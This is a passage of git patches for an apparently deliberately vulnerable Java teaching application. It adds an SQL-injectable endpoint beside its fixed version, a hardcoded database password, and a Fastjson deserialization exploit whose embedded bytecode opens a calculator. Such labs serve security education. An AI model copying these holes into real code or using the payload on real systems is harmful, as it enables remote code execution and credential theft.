@@ -17,9 +19,13 @@
  */
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
+    private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class);
+
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
                        AccessDeniedException accessDeniedException) throws IOException, ServletException {
+
+        logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + request.getHeader("referer"));
         response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
         response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
         response.getWriter().write("CSRF check failed by JoyChou.");  // response contents
diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/security/HttpFilter.java
new file mode 100644
index 00000000..99309410
--- /dev/null
+++ b/src/main/java/org/joychou/security/HttpFilter.java
@@ -0,0 +1,89 @@
+package org.joychou.security;
+
+
+import javax.servlet.*;
+import javax.servlet.annotation.WebFilter;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+import org.apache.commons.lang.StringUtils;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.util.AntPathMatcher;
+import org.springframework.util.PathMatcher;
+
+
+/**
+ * Check referer for all GET requests with callback parameters.
+ * If the check of referer fails, a 403 forbidden error page will be returned.
+ *
+ * Still need to add @ServletComponentScan annotation in Application.java.
+ *
+ */
+@WebFilter(filterName = "referFilter", urlPatterns = "/*")
+public class HttpFilter implements Filter {
+
+    @Value("${joychou.security.referer.enabled}")
+    private Boolean referSecEnabled = false;
+
+    @Value("${joychou.security.jsonp.callback}")
+    private String[] callbacks;
+
+    @Value("${joychou.security.referer.hostwhitelist}")
+    private String[] referWhitelist;
+
+    @Value("${joychou.security.referer.uri}")
+    private String[] referUris;
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    private final Logger logger= LoggerFactory.getLogger(HttpFilter.class);
+
+    @Override
+    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
+            throws IOException, ServletException {
+
+        HttpServletRequest request = (HttpServletRequest) req;
+        HttpServletResponse response = (HttpServletResponse) res;
+
+        String refer = request.getHeader("referer");
+        PathMatcher matcher = new AntPathMatcher();
+        boolean isMatch = false;
+        for (String uri: referUris) {
+            if ( matcher.match (uri, request.getRequestURI()) ) {
+                isMatch = true;
+                break;
+            }
+        }
+
+        if (isMatch) {
+            if (referSecEnabled) {
+                // Check referer for all GET requests with callback parameters.
+                for (String callback: callbacks) {
+                    if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){
+                        // If the check of referer fails, a 403 forbidden error page will be returned.
+                        if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
+                            logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + refer);
+                            response.sendRedirect("https://test.joychou.org/error3.html");
+                            return;
+                        }
+                    }
+                }
+            }
+        }
+
+
+
+        filterChain.doFilter(req, res);
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+}
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index 6eab2cac..63de75d8 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -55,11 +55,23 @@ public static Boolean checkSSRF(String url) {
     /**
      * Suitable for: TTL isn't set to 0 & Redirect is forbidden.
      *
-     * @param url the url needs to check
+     * @param url The url that needs to check.
      * @return Safe url returns true. Dangerous url returns false.
      */
     public static boolean checkSSRFWithoutRedirect(String url) {
         return !SSRFChecker.isInnerIPByUrl(url);
     }
 
+    /**
+     * Check SSRF by host white list.
+     * This is the simplest and most effective method to fix ssrf vul.
+     *
+     * @param url The url that needs to check.
+     * @param hostWlist host whitelist
+     * @return Safe url returns true. Dangerous url returns false.
+     */
+    public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) {
+        return checkURLbyEndsWith(url, hostWlist);
+    }
+
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 68af7121..5ad22e2b 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -20,22 +20,27 @@
 @Configuration
 public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
-    @Value("${org.joychou.security.csrf}")
-    private Boolean csrfSwitch;  // get csrf switch in application.properties
+    @Value("${joychou.security.csrf.enabled}")
+    private Boolean csrfEnabled = false;
 
-    RequestMatcher csrfRequestMatcher = new RequestMatcher() {
+    @Value("${joychou.security.csrf.exclude.url}")
+    private String[] csrfExcludeUrl;
+
+    @Value("${joychou.security.csrf.method}")
+    private String[] csrfMethod = {"POST"};
 
-        // 配置不需要CSRF校验的请求方式
-        private final HashSet<String> allowedMethods = new HashSet<String>(
-                Arrays.asList("GET", "HEAD", "TRACE", "OPTIONS"));
+    RequestMatcher csrfRequestMatcher = new RequestMatcher() {
 
         @Override
         public boolean matches(HttpServletRequest request) {
+
+            // 配置需要CSRF校验的请求方式，
+            HashSet<String> allowedMethods = new HashSet<String>(Arrays.asList(csrfMethod));
             // return false表示不校验csrf
-            if (!csrfSwitch) {
+            if (!csrfEnabled) {
                 return false;
             }
-            return !this.allowedMethods.contains(request.getMethod());
+            return allowedMethods.contains(request.getMethod());
         }
 
     };
@@ -47,7 +52,7 @@ protected void configure(HttpSecurity http) throws Exception {
         // 但存在后端多台服务器情况，session不能同步的问题，所以一般使用cookie模式。
         http.csrf()
                 .requireCsrfProtectionMatcher(csrfRequestMatcher)
-                .ignoringAntMatchers("/xxe/**", "/fastjon/**")  // 不进行csrf校验的uri，多个uri使用逗号分隔
+                .ignoringAntMatchers(csrfExcludeUrl)  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
         // 自定义csrf校验失败的代码，默认是返回403错误页面
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java
deleted file mode 100644
index e88d854f..00000000
--- a/src/main/java/org/joychou/security/jsonpFilter.java
+++ /dev/null
@@ -1,60 +0,0 @@
-package org.joychou.security;
-
-
-import javax.servlet.*;
-import javax.servlet.annotation.WebFilter;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-import java.io.IOException;
-import org.apache.commons.lang.StringUtils;
-import org.springframework.beans.factory.annotation.Value;
-
-
-/**
- * Check referer for all GET requests with callback parameters.
- * If the check of referer fails, a 403 forbidden error page will be returned.
- *
- * Still need to add @ServletComponentScan annotation in Application.java.
- *
- */
-@WebFilter(filterName = "referSecCheck", urlPatterns = "/*")
-public class jsonpFilter implements Filter {
-
-    @Value("${org.joychou.security.jsonp}")
-    private Boolean jsonpSwitch;  // get application.properties configure
-
-    @Override
-    public void init(FilterConfig filterConfig) throws ServletException {
-
-    }
-
-    @Override
-    public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain)
-            throws IOException, ServletException {
-
-        HttpServletRequest request = (HttpServletRequest) req;
-        HttpServletResponse response = (HttpServletResponse) res;
-
-        String refer = request.getHeader("referer");
-        String referWhitelist[] = {"joychou.org", "joychou.com"};
-
-        if (jsonpSwitch) {
-            // Check referer for all GET requests with callback parameters.
-            if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){
-                // If the check of referer fails, a 403 forbidden error page will be returned.
-                if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){
-                    response.sendRedirect("https://test.joychou.org/error3.html");
-                    return;
-                }
-            }
-        }
-
-
-        filterChain.doFilter(req, res);
-    }
-
-    @Override
-    public void destroy() {
-
-    }
-}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index a3b3a4bb..ddf4d13b 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -3,6 +3,27 @@
 management.security.enabled=false
 # logging.config=classpath:logback-online.xml
 
-# jsonp check referer switch
-org.joychou.security.jsonp = false
-org.joychou.security.csrf = false
\ No newline at end of file
+
+
+### check referer configuration begins ###
+joychou.security.referer.enabled = true
+joychou.security.referer.hostwhitelist = joychou.org, joychou.com
+# Only support ant url style.
+joychou.security.referer.uri = /jsonp/**
+### check referer configuration ends ###
+
+
+### csrf configuration begins ###
+# csrf token check
+joychou.security.csrf.enabled = true
+# URI without CSRF check (only support ANT url format)
+joychou.security.csrf.exclude.url = /xxe/**, /fastjon/**
+# method for CSRF check
+joychou.security.csrf.method = POST
+### csrf configuration ends ###
+
+
+### jsonp configuration begins ###  # auto convert json to jsonp
+# callback parameters name
+joychou.security.jsonp.callback = callback, _callback
+### jsonp configuration ends ###
\ No newline at end of file

From cc946392d249b8fca951764a89bdcff4f66a822c Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 17 Jul 2019 22:07:45 +0800
Subject: [PATCH 038/108] add mybatis sql

---
 java-sec-code.iml                             |   9 ++
 pom.xml                                       |   8 ++
 .../java/org/joychou/controller/SQLI.java     | 135 +++++++++++++++---
 .../org/joychou/controller/jsonp/JSONP.java   |   2 +-
 src/main/java/org/joychou/dao/User.java       |  34 +++++
 .../java/org/joychou/mapper/UserMapper.java   |  18 +++
 src/main/resources/application.properties     |   7 +
 src/main/resources/mapper/UserMapper.xml      |  23 +++
 8 files changed, 214 insertions(+), 22 deletions(-)
 create mode 100644 src/main/java/org/joychou/dao/User.java
 create mode 100644 src/main/java/org/joychou/mapper/UserMapper.java
 create mode 100644 src/main/resources/mapper/UserMapper.xml

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 8a7c0cb7..10a8f2b2 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -171,5 +171,14 @@
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
     <orderEntry type="library" name="Maven: commons-httpclient:commons-httpclient:3.1" level="project" />
+    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-starter:1.3.2" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-jdbc:1.5.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-jdbc:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat:tomcat-juli:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-jdbc:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-tx:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
+    <orderEntry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
+    <orderEntry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index bcfd042c..1c13246a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -169,6 +169,14 @@
             <version>3.1</version>
         </dependency>
 
+
+        <!-- mybatis -->
+        <dependency>
+            <groupId>org.mybatis.spring.boot</groupId>
+            <artifactId>mybatis-spring-boot-starter</artifactId>
+            <version>1.3.2</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index a65b8ba8..a4344b85 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -1,9 +1,10 @@
 package org.joychou.controller;
 
 
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
+import org.joychou.mapper.UserMapper;
+import org.joychou.dao.User;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletRequest;
 import java.sql.*;
@@ -15,44 +16,46 @@
  * @desc    SQL Injection
  */
 
-@Controller
+@RestController
 @RequestMapping("/sqli")
 public class SQLI {
 
-    @RequestMapping("/jdbc")
-    @ResponseBody
-    public static String jdbc_sqli(HttpServletRequest request){
+    private static String driver = "com.mysql.jdbc.Driver";
+    private static String url = "jdbc:mysql://localhost:3306/java_sec_code";
+    private static String user = "root";
+    private static String password = "woshishujukumima";
 
-        String name = request.getParameter("name");
-        String driver = "com.mysql.jdbc.Driver";
-        String url = "jdbc:mysql://localhost:3306/sectest";
-        String user = "root";
-        String password = "woshishujukumima";
+    @Autowired
+    private UserMapper userMapper;
+
+
+    /**
+     * Vul Code.
+     * http://localhost:8080/sqli/jdbc/vul?username=joychou
+     *
+     * @param username username
+     */
+    @RequestMapping("/jdbc/vul")
+    public static String jdbc_sqli_vul(@RequestParam("username") String username){
         String result = "";
         try {
             Class.forName(driver);
-            Connection con = DriverManager.getConnection(url,user,password);
+            Connection con = DriverManager.getConnection(url, user, password);
 
             if(!con.isClosed())
                 System.out.println("Connecting to Database successfully.");
 
             // sqli vuln code 漏洞代码
              Statement statement = con.createStatement();
-             String sql = "select * from users where name = '" + name + "'";
+             String sql = "select * from users where username = '" + username + "'";
              System.out.println(sql);
              ResultSet rs = statement.executeQuery(sql);
 
-            // fix code 用预处理修复SQL注入
-//            String sql = "select * from users where name = ?";
-//            PreparedStatement st = con.prepareStatement(sql);
-//            st.setString(1, name);
-//            System.out.println(st.toString());  // 预处理后的sql
-//            ResultSet rs = st.executeQuery();
 
             System.out.println("-----------------");
 
             while(rs.next()){
-                String res_name = rs.getString("name");
+                String res_name = rs.getString("username");
                 String res_pwd = rs.getString("password");
                 result +=  res_name + ": " + res_pwd + "\n";
                 System.out.println(res_name + ": " + res_pwd);
@@ -77,4 +80,94 @@ public static String jdbc_sqli(HttpServletRequest request){
         return result;
     }
 
+
+    /**
+     * Security Code.
+     * http://localhost:8080/sqli/jdbc/sec?username=joychou
+     *
+     * @param username username
+     */
+    @RequestMapping("/jdbc/sec")
+    public static String jdbc_sqli_sec(@RequestParam("username") String username){
+
+        String result = "";
+        try {
+            Class.forName(driver);
+            Connection con = DriverManager.getConnection(url, user, password);
+
+            if(!con.isClosed())
+                System.out.println("Connecting to Database successfully.");
+
+
+            // fix code
+            String sql = "select * from users where username = ?";
+            PreparedStatement st = con.prepareStatement(sql);
+            st.setString(1, username);
+            System.out.println(st.toString());  // sql after prepare statement
+            ResultSet rs = st.executeQuery();
+
+            System.out.println("-----------------");
+
+            while(rs.next()){
+                String res_name = rs.getString("username");
+                String res_pwd = rs.getString("password");
+                result +=  res_name + ": " + res_pwd + "\n";
+                System.out.println(res_name + ": " + res_pwd);
+
+            }
+            rs.close();
+            con.close();
+
+
+        }catch (ClassNotFoundException e) {
+            System.out.println("Sorry,can`t find the Driver!");
+            e.printStackTrace();
+        }catch (SQLException e) {
+            e.printStackTrace();
+        }catch (Exception e) {
+            e.printStackTrace();
+
+        }finally{
+            System.out.println("-----------------");
+            System.out.println("Connect database done.");
+        }
+        return result;
+    }
+
+
+    /**
+     * security code
+     * http://localhost:8080/sqli/mybatis/sec01?username=joychou
+     *
+     * @param username username
+     */
+    @GetMapping("/mybatis/sec01")
+    public User mybatis_vul1(@RequestParam("username") String username) {
+        return userMapper.findByUserName(username);
+    }
+
+
+
+    /**
+     * security code
+     * http://localhost:8080/sqli/mybatis/sec02?id=1
+     *
+     * @param id id
+     */
+    @GetMapping("/mybatis/sec02")
+    public User mybatis_v(@RequestParam("id") Integer id) {
+        return userMapper.findById(id);
+    }
+
+
+    /**
+     * security code
+     * http://localhost:8080/sqli/mybatis/sec03
+     **/
+    @GetMapping("/mybatis/sec03")
+    public User mybatis_vul2() {
+        return userMapper.OrderByUsername();
+    }
+
+
 }
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index f78b2aa8..2f474440 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -57,7 +57,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon
     /**
      * Adding callback or cback on parameter can automatically return jsonp data.
      * http://localhost:8080/jsonp/advice?callback=test
-     * http://localhost:8080/jsonp/advice?cback=test
+     * http://localhost:8080/jsonp/advice?_callback=test
      *
      * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
      *         Such as JSONOjbect or JavaBean. String type cannot be used.
diff --git a/src/main/java/org/joychou/dao/User.java b/src/main/java/org/joychou/dao/User.java
new file mode 100644
index 00000000..b9bc8341
--- /dev/null
+++ b/src/main/java/org/joychou/dao/User.java
@@ -0,0 +1,34 @@
+package org.joychou.dao;
+
+import java.io.Serializable;
+
+public class User implements Serializable {
+    private static final long serialVersionUID = 1L;
+    private Integer id;
+    private String username;
+    private String password;
+
+    public Integer getId() {
+        return id;
+    }
+    public void setId(Integer id) {
+        this.id = id;
+    }
+
+
+    public String getUsername() {
+        return username;
+    }
+    public void setUsername(String username) {
+        this.username = username;
+    }
+
+
+    public String getPassword() {
+        return password;
+    }
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+}
diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java
new file mode 100644
index 00000000..33114048
--- /dev/null
+++ b/src/main/java/org/joychou/mapper/UserMapper.java
@@ -0,0 +1,18 @@
+package org.joychou.mapper;
+
+import org.apache.ibatis.annotations.Mapper;
+import org.apache.ibatis.annotations.Param;
+import org.apache.ibatis.annotations.Select;
+import org.joychou.dao.User;
+
+@Mapper
+public interface UserMapper {
+
+    // If using simple sql, we can use annotation.
+    @Select("select * from users where username = #{username}")
+    User findByUserName(@Param("username") String username);
+
+    User findById(Integer id);
+
+    User OrderByUsername();
+}
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index ddf4d13b..c37be3fa 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,4 +1,11 @@
 
+spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&useSSL=false&serverTimezone=GMT%2B8
+spring.datasource.username=root
+spring.datasource.password=woshishujukumima
+spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
+mybatis.mapper-locations=classpath:mapper/*.xml
+
+
 # Spring Boot Actuator Vulnerable Config
 management.security.enabled=false
 # logging.config=classpath:logback-online.xml
diff --git a/src/main/resources/mapper/UserMapper.xml b/src/main/resources/mapper/UserMapper.xml
new file mode 100644
index 00000000..dd88f424
--- /dev/null
+++ b/src/main/resources/mapper/UserMapper.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
+
+<mapper namespace="org.joychou.mapper.UserMapper">
+
+    <resultMap type="org.joychou.dao.User" id="User">
+        <id column="id" property="id" javaType="java.lang.Integer" jdbcType="NUMERIC"/>
+        <id column="username" property="username" javaType="java.lang.String" jdbcType="VARCHAR"/>
+        <id column="password" property="password" javaType="java.lang.String" jdbcType="VARCHAR"/>
+    </resultMap>
+
+    <!--<select id="findByUserName" resultMap="User">-->
+	    <!--select * from users where username = #{username}-->
+    <!--</select>-->
+
+    <select id="findById" resultMap="User">
+        select * from users where id = #{id}
+    </select>
+
+    <select id="OrderByUsername" resultMap="User">
+        select * from users order by id asc limit 1
+    </select>
+</mapper>
\ No newline at end of file

From 839f5328e7ce5ccfa5ad8635262e6334113fbf9b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 19 Jul 2019 17:27:29 +0800
Subject: [PATCH 039/108] Add ssti & resolveClass blacklist

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 java-sec-code.iml                             |  1 +
 pom.xml                                       |  7 ++
 .../java/org/joychou/controller/Fastjson.java | 10 ++-
 .../java/org/joychou/controller/SSTI.java     | 37 +++++++++
 .../java/org/joychou/controller/Test.java     |  4 +-
 .../java/org/joychou/mapper/UserMapper.java   |  5 +-
 .../security/AntObjectInputStream.java        | 78 +++++++++++++++++++
 src/main/resources/application.properties     |  2 +-
 10 files changed, 139 insertions(+), 7 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/SSTI.java
 create mode 100644 src/main/java/org/joychou/security/AntObjectInputStream.java

diff --git a/README.md b/README.md
index b1f4b020..3b35747f 100644
--- a/README.md
+++ b/README.md
@@ -29,6 +29,7 @@ Sort by letter.
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
+- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
diff --git a/README_zh.md b/README_zh.md
index e5d00569..70bbaedf 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -26,6 +26,7 @@
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
+- [SSTI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSTI.java)
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 10a8f2b2..9cb2ac16 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -180,5 +180,6 @@
     <orderEntry type="library" name="Maven: org.mybatis.spring.boot:mybatis-spring-boot-autoconfigure:1.3.2" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis:mybatis:3.4.6" level="project" />
     <orderEntry type="library" name="Maven: org.mybatis:mybatis-spring:1.3.2" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.velocity:velocity:1.7" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 1c13246a..99e59ea0 100644
--- a/pom.xml
+++ b/pom.xml
@@ -177,6 +177,13 @@
             <version>1.3.2</version>
         </dependency>
 
+        <!-- ssti -->
+        <dependency>
+            <groupId>org.apache.velocity</groupId>
+            <artifactId>velocity</artifactId>
+            <version>1.7</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java
index 6609ad54..684ee253 100644
--- a/src/main/java/org/joychou/controller/Fastjson.java
+++ b/src/main/java/org/joychou/controller/Fastjson.java
@@ -2,6 +2,7 @@
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
+import com.alibaba.fastjson.parser.Feature;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -29,9 +30,10 @@ public static String Deserialize(@RequestBody String params) {
         }
     }
 
-    public static void main(String[] args){
-        String str = "{\"name\": \"fastjson\"}";
-        JSONObject jo = JSON.parseObject(str);
-        System.out.println(jo.get("name"));  // fastjson
+    public static void main(String[] args) {
+
+        // Open calc in mac
+        String payload = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_bytecodes\": [\"yv66vgAAADEAOAoAAwAiBwA2BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQAzTG1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwACgALBwAoAQAxbWUvbGlnaHRsZXNzL2Zhc3Rqc29uL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAHW1lL2xpZ2h0bGVzcy9mYXN0anNvbi9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQASb3BlbiAtYSBDYWxjdWxhdG9yCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA9saWdodGxlc3MvcHduZXIBABFMbGlnaHRsZXNzL3B3bmVyOwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADwADgAAAAwAAQAAAAUADwA3AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAAD8ADgAAACAAAwAAAAEADwA3AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAAEIADgAAACoABAAAAAEADwA3AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAABsAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAAAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==\"], \"_name\": \"lightless\", \"_tfactory\": { }, \"_outputProperties\":{ }}";
+        JSONObject object = JSON.parseObject(payload, Feature.SupportNonPublicField);
     }
 }
diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java
new file mode 100644
index 00000000..7e9d2edb
--- /dev/null
+++ b/src/main/java/org/joychou/controller/SSTI.java
@@ -0,0 +1,37 @@
+package org.joychou.controller;
+
+
+import org.apache.velocity.VelocityContext;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import org.apache.velocity.app.Velocity;
+
+import java.io.StringWriter;
+
+@RestController
+@RequestMapping("/ssti")
+public class SSTI {
+
+    /**
+     * SSTI of Java velocity.
+     * Open a calculator in MacOS.
